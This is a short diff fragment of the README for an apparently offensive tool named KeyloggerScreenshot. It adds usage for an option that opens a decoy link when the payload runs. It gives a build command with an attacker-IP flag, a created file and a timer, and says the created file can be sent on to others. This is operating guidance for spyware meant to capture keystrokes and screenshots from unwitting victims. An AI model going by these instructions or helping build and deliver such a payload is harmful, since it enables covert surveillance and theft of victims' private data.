Kill0geR/KeyloggerScreenshot/README.md

 The default seconds is 60

+To specify a link that will be opend when executed.
+Use:
+``python KLS_start.py -aip 127.0.0.1 -cf test.py -s 120 -phs https://www.google.com`

 After running the code you can send the created filename

 After the specified seconds your directory will look like this: